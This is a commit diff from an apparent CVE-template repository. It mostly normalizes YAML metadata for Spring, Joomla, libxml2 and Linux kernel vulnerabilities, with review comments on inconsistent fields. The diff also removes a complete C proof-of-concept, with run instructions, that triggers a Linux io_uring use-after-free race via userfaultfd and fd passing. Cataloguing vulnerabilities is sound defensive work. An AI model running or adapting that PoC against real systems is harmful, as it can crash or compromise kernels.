|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2020-5398
|
||||
source:
|
||||
https://github.com/motikan2010/CVE-2020-5398
|
||||
source: https://github.com/motikan2010/CVE-2020-5398
|
||||
info:
|
||||
name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。
|
||||
severity: high
|
||||
|
@ -14,7 +13,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-5398
|
||||
- https://pivotal.io/security/cve-2020-5398
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-5398
|
||||
cwe-id: CWE-494, CWE-79
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
|
||||
severity: critical
|
||||
description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。
|
||||
scope-of-influence: Spring Cloud Function<3.1.7
|
||||
scope-of-influence:
|
||||
Spring Cloud Function<3.1.7
|
||||
reference:
|
||||
- https://github.com/dinosn/CVE-2022-22963
|
||||
- https://avd.aliyun.com/search?q=CVE-2022-22963
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
|
||||
severity: critical
|
||||
description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。
|
||||
scope-of-influence: Spring Framework <5.2.20 and JDK >=9
|
||||
scope-of-influence:
|
||||
Spring Framework <5.2.20 and JDK >=9
|
||||
reference:
|
||||
- https://help.aliyun.com/noticelist/articleid/1061022382.html
|
||||
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。
|
||||
severity: critical
|
||||
description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。
|
||||
scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8
|
||||
scope-of-influence:
|
||||
5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31692
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2023-23752
|
||||
source:
|
||||
https://github.com/Jenderal92/Joomla-CVE-2023-23752
|
||||
source: https://github.com/Jenderal92/Joomla-CVE-2023-23752
|
||||
info:
|
||||
name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。
|
||||
severity: medium
|
||||
|
@ -17,5 +16,4 @@ info:
|
|||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 非法访问
|
||||
tags: 非法访问
|
|
@ -16,4 +16,4 @@ info:
|
|||
cwe-id: CWE-125
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2020,缓冲区错误
|
||||
tags: cve2020, 缓冲区错误
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3517
|
||||
classification:
|
||||
|
@ -16,4 +16,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,缓冲区错误
|
||||
tags: cve2021, 缓冲区错误
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3518
|
||||
classification:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。
|
||||
scope-of-influence:
|
||||
|
||||
libxml2< v2.9.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3537
|
||||
classification:
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2011-4916
|
||||
source: https://www.openwall.com/lists/oss-security/2011/11/05/3
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: medium
|
||||
description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4916
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: medium
|
||||
description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4916
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2011-4917
|
||||
source: https://www.openwall.com/lists/oss-security/2011/11/07/9
|
||||
info:
|
||||
name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
|
||||
severity: medium
|
||||
description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2011-4917
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4917
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
||||
name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
|
||||
severity: medium
|
||||
description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
|
||||
scope-of-influence:
|
||||
Linux kernel <= 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2011-4917
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2011-4917
|
||||
cwe-id: CWE-200
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: information disclosure
|
|
@ -37,6 +37,7 @@ info:
|
|||
- https://usn.ubuntu.com/4117-1/
|
||||
- https://usn.ubuntu.com/4118-1/
|
||||
- https://www.debian.org/security/2019/dsa-4484
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2019-13272
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-12351
|
|||
source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
severity: High
|
||||
description: |
|
||||
Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
|
||||
scope-of-influence:
|
||||
|
|
|
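Review bot: `severity: High` replaces `高危` but is capitalised, while the other entries in this commit use lowercase `high`. Use the lowercase value so the field has a single vocabulary.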
@ -6,15 +6,17 @@ info:
|
|||
description: |
|
||||
Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。
|
||||
scope-of-influence:
|
||||
v2.6.19-rc1~v5.12-rc7
|
||||
v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22555
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-22555
|
||||
cwe-id: CWE-787
|
||||
tags: cve2021,权限提升,容器逃逸
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升, 容器逃逸
|
|
@ -11,8 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/cve-2021-26708
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.0
|
||||
cve-id: CVE-2021-26708
|
||||
cwe-id: CWE-667
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/
|
||||
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2021-29155
|
||||
cwe-id: CWE-125
|
||||
|
|
|
@ -5,11 +5,9 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。
|
||||
|
||||
scope-of-influence:
|
||||
Red Hat Enterprise Linux 8
|
||||
Linux kernel before 5.12.13
|
||||
|
||||
Linux kernel < 5.12.13
|
||||
reference:
|
||||
- https://access.redhat.com/security/cve/CVE-2021-33624
|
||||
- https://ubuntu.com/security/CVE-2021-33624
|
||||
|
@ -17,7 +15,6 @@ info:
|
|||
- https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html
|
||||
- https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db
|
||||
- http://www.openwall.com/lists/oss-security/2021/06/21/1
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 4.7
|
||||
|
@ -25,5 +22,4 @@ info:
|
|||
cwe-id: CWE-203
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
|
||||
tags: 内存泄露, 侧信道攻击
|
|
@ -15,4 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-22555
|
||||
cwe-id: CWE-120
|
||||
tags: cve2021,权限提升
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
|
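Review bot: `cve-id: CVE-2021-22555` in this file repeats the id of the Netfilter entry changed earlier in this commit, yet the `cwe-id` differs (CWE-120 here, CWE-787 there), and the hunk line numbers show this is a second file. Before adding `cnvd-id` and `kve-id`, check whether this file's `cve-id` is a copy-paste leftover or whether two templates really describe the same CVE, in which case the CWE values should agree.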
@ -11,13 +11,15 @@ info:
|
|||
Ubuntu 18.04 LTS
|
||||
Ubuntu 16.04 LTS
|
||||
Ubuntu 14.04 ESM
|
||||
(Linux-kernel < 5.11)
|
||||
Linux-kernel < 5.11
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3493
|
||||
- https://ubuntu.com/security/notices/USN-4917-1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-3493
|
||||
cwe-id: CWE-269, CEW-270
|
||||
tags: cve2021,权限提升
|
||||
cwe-id: CWE-269, CWE-270
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
|
@ -17,4 +17,6 @@ info:
|
|||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-4154
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 内存错误引用
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
|
||||
scope-of-influence:
|
||||
Linux 2.1.94~v5.13.12
|
||||
Linux 2.1.94 < Linux-Kernel < v5.13.12
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42008
|
||||
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
|
||||
|
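Review bot: the new scope line `Linux 2.1.94 < Linux-Kernel < v5.13.12` uses strict bounds at both ends, which excludes 2.1.94 and 5.13.12, while the line it replaces (`Linux 2.1.94~v5.13.12`) was an inclusive range and the description in the same hunk says the flaw is present "before 5.13.13". Suggest `2.1.94 ≤ Linux-Kernel ≤ 5.13.12` (or `< 5.13.13`), and dropping the stray `Linux` and `v` prefixes so the line matches the other normalized entries.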
@ -16,6 +16,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-42008
|
||||
cwe-id: CWE-787
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 协议解码溢出
|
|
@ -11,8 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-4204
|
||||
- https://www.openwall.com/lists/oss-security/2022/01/11/4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-score: 7.1
|
||||
cve-id: CVE-2021-4204
|
||||
cwe-id: CWE-787, CEW-20
|
||||
tags: cve2021,权限提升
|
||||
cwe-id: CWE-787, CWE-20
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021, 权限提升
|
|
@ -5,13 +5,10 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。
|
||||
|
||||
scope-of-influence:
|
||||
Linux kernel before 5.14.14
|
||||
|
||||
Linux kernel < 5.14.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2021-42327
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.7
|
||||
|
@ -19,5 +16,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
|
||||
tags: 缓冲区溢出
|
|
@ -1,6 +0,0 @@
|
|||
### 漏洞复现
|
||||
```shell
|
||||
$ gcc poc.c -o poc
|
||||
$ chmod +x ./poc
|
||||
$ ./poc
|
||||
```
|
|
@ -1,174 +0,0 @@
|
|||
#define _GNU_SOURCE
|
||||
#include <linux/io_uring.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <liburing.h>
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
#include <linux/userfaultfd.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <err.h>
|
||||
|
||||
static int userfaultfd(int flags)
|
||||
{
|
||||
return syscall(__NR_userfaultfd, flags);
|
||||
}
|
||||
|
||||
static char buffer[4096];
|
||||
static void fault_manager(int ufd)
|
||||
{
|
||||
struct uffd_msg msg;
|
||||
struct uffdio_copy copy;
|
||||
read(ufd, &msg, sizeof(msg));
|
||||
if (msg.event != UFFD_EVENT_PAGEFAULT)
|
||||
err(1, "event not pagefault");
|
||||
copy.dst = msg.arg.pagefault.address;
|
||||
copy.src = (long) buffer;
|
||||
copy.len = 4096;
|
||||
copy.mode = 0;
|
||||
copy.copy = 0;
|
||||
sleep(2);
|
||||
ioctl(ufd, UFFDIO_COPY, ©);
|
||||
close(ufd);
|
||||
}
|
||||
|
||||
static char *bogus;
|
||||
|
||||
static void start_ufd(int ufd)
|
||||
{
|
||||
struct uffdio_api api;
|
||||
struct uffdio_register reg;
|
||||
|
||||
bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
|
||||
api.api = UFFD_API;
|
||||
api.features = 0;
|
||||
api.ioctls = 0;
|
||||
ioctl(ufd, UFFDIO_API, &api);
|
||||
|
||||
reg.range.start = (long) bogus;
|
||||
reg.range.len = 4096;
|
||||
reg.mode = UFFDIO_REGISTER_MODE_MISSING;
|
||||
reg.ioctls = 0;
|
||||
|
||||
ioctl(ufd, UFFDIO_REGISTER, ®);
|
||||
}
|
||||
|
||||
|
||||
int sendfd(int s, int fd)
|
||||
{
|
||||
struct msghdr msg;
|
||||
char buf[4096];
|
||||
struct cmsghdr *cmsg;
|
||||
int fds[1] = { fd };
|
||||
|
||||
memset(&msg, 0, sizeof(msg));
|
||||
memset(buf, 0, sizeof(buf));
|
||||
|
||||
msg.msg_control = buf;
|
||||
msg.msg_controllen = sizeof(buf);
|
||||
|
||||
cmsg = CMSG_FIRSTHDR(&msg);
|
||||
cmsg->cmsg_level = SOL_SOCKET;
|
||||
cmsg->cmsg_type = SCM_RIGHTS;
|
||||
cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
|
||||
memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
|
||||
|
||||
msg.msg_controllen = CMSG_SPACE(sizeof(fds));
|
||||
|
||||
sendmsg(s, &msg, 0);
|
||||
}
|
||||
|
||||
int io_uring_setup(int r, void *p)
|
||||
{
|
||||
return syscall(__NR_io_uring_setup, r, p);
|
||||
}
|
||||
|
||||
int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig)
|
||||
{
|
||||
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
|
||||
}
|
||||
|
||||
int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args)
|
||||
{
|
||||
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
|
||||
}
|
||||
|
||||
int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring)
|
||||
{
|
||||
struct io_uring_sqe *sqe;
|
||||
io_uring_queue_mmap(fd, params, ring);
|
||||
sqe = io_uring_get_sqe(ring);
|
||||
sqe->opcode = IORING_OP_WRITEV;
|
||||
sqe->fd = 1;
|
||||
sqe->addr = (long) bogus;
|
||||
sqe->len = 1;
|
||||
sqe->flags = IOSQE_FIXED_FILE;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int ufd;
|
||||
pid_t manager;
|
||||
|
||||
struct io_uring ring;
|
||||
int fd;
|
||||
struct io_uring_params *params;
|
||||
int rfd[32];
|
||||
int s[2];
|
||||
int backup_fd;
|
||||
|
||||
struct iovec *iov;
|
||||
iov = (void *) buffer;
|
||||
iov->iov_base = "hello, world!\n";
|
||||
iov->iov_len = 14;
|
||||
|
||||
ufd = userfaultfd(0);
|
||||
if (ufd < 0)
|
||||
err(1, "userfaultfd");
|
||||
start_ufd(ufd);
|
||||
|
||||
if ((manager = fork()) == 0) {
|
||||
fault_manager(ufd);
|
||||
exit(0);
|
||||
}
|
||||
close(ufd);
|
||||
|
||||
socketpair(AF_UNIX, SOCK_DGRAM, 0, s);
|
||||
|
||||
params = malloc(sizeof(*params));
|
||||
memset(params, 0, sizeof(*params));
|
||||
params->flags = IORING_SETUP_SQPOLL;
|
||||
fd = io_uring_setup(32, params);
|
||||
|
||||
rfd[0] = s[1];
|
||||
rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644);
|
||||
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2);
|
||||
close(rfd[1]);
|
||||
|
||||
sendfd(s[0], fd);
|
||||
|
||||
close(s[0]);
|
||||
close(s[1]);
|
||||
|
||||
prepare_request(fd, params, &ring);
|
||||
io_uring_submit(&ring);
|
||||
|
||||
io_uring_queue_exit(&ring);
|
||||
|
||||
sleep(1);
|
||||
|
||||
close(socket(AF_UNIX, SOCK_DGRAM, 0));
|
||||
|
||||
wait(NULL);
|
||||
wait(NULL);
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -6,14 +6,16 @@ info:
|
|||
description: |
|
||||
Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。
|
||||
scope-of-influence:
|
||||
5.1-rc1~5.16.2
|
||||
5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0185
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.4
|
||||
cve-id: CVE-2022-0185
|
||||
cwe-id: CWE-190
|
||||
tags: 权限提升,容器逃逸,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, 容器逃逸, cve2022
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-0435
|
||||
source:
|
||||
https://github.com/wlswotmd/CVE-2022-0435
|
||||
source: https://github.com/wlswotmd/CVE-2022-0435
|
||||
info:
|
||||
name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
|
||||
severity: high
|
||||
|
|
|
@ -2,18 +2,20 @@ id: CVE-2022-0492
|
|||
source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
severity: High
|
||||
description: |
|
||||
A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
|
||||
scope-of-influence:
|
||||
2.6.24-rc1~5.17-rc3
|
||||
2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3
|
||||
reference:
|
||||
- http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0492
|
||||
- https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0492
|
||||
cwe-id: CWE-287
|
||||
tags: 权限提升,容器逃逸,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 权限提升, 容器逃逸, cve2022
|
|
@ -12,7 +12,7 @@ info:
|
|||
- https://bugzilla.redhat.com/show_bug.cgi?id=2060795
|
||||
- https://security.netapp.com/advisory/ntap-20220325-0005/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0847
|
||||
cwe-id: CWE-665, CWE-281
|
||||
|
|
|
@ -15,6 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-0995
|
||||
cwe-id: CWE-787
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
tags: 内核越界,权限提升,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 内核越界, 权限提升, cve2022
|
|
@ -2,17 +2,19 @@ id: CVE-2022-1015
|
|||
source: https://github.com/pqlx/CVE-2022-1015
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
severity: Medium
|
||||
description: |
|
||||
在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。
|
||||
scope-of-influence:
|
||||
5.12 ≤ kernel < 5.17
|
||||
5.12 ≤ Linux-Kernel < 5.17
|
||||
reference:
|
||||
